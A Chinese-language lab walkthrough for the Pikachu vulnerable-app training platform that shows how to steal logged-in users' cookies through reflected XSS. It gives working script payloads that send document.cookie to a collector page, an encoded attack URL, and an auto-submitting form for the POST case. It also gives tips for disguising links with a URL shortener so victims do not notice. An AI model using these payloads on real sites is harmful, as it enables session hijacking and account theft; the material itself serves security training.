利用Pikachu管理工具中XSS后台获取用户
如何利用XSS漏洞,获取用户cookie信息
使用Pikachu Xss后台来获取被攻击用户的cookie。
Pikachu Xss获取cookies结果列表:
反射型xss(get)获取用户的cookie
Pikachu中反射型xss(get)为例:
payload :<script>document.location='http://192.168.10.7:85/pikachu-master/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>
location参数的值必须填写Pikachu漏洞管理工具中cookie.php文件的路径。
文本框中输入后,将构造的url发给被攻击用户,用户点击后即可在xss后台获取用户的cookies信息。
构造攻击url:http://192.168.10.7:85/pikachu-master/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F192.168.10.7%3A85%2Fpikachu-master%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E&submit=submit
将次url发送给其它pikachu用户,这里的ip为内网ip,若是部署在公网上ip修改为公网ip即可。
构造的url太长很容易让人看出来,可以使用:https://dwz.51.la/将长链接转换为短链接。
攻击:
通过各种路径将构造的url发给不攻击用户,当用户点击链接后。在Pikachu Xss后台查看cookies结果列表中生成该用户的cookies信息:
反射型xss(post)为例:
payload :
postxss.html
<html>
<head>
<script>
window.onload = function(){
document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://192.168.10.7:85/pikachu-master/vul/xss/xsspost/xss_reflected_post.php">
<input id="xss_in" type="text" name="message" value="<script>document.location='http://192.168.10.7:85/pikachu-master/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>" />
<input id="postsubmit" type="submit" name="submit" value="submit"/>
</form>
</body>
</html>
攻击:
将postxss.html部署到自己的服务器上:
例如:http://192.168.10.7:85/postxss.html,将该url发送给已经登录到Pikachu中的用户,这里必须已经登录到xss(post)中的用户,该用户点击后xss后台获取到cookies信息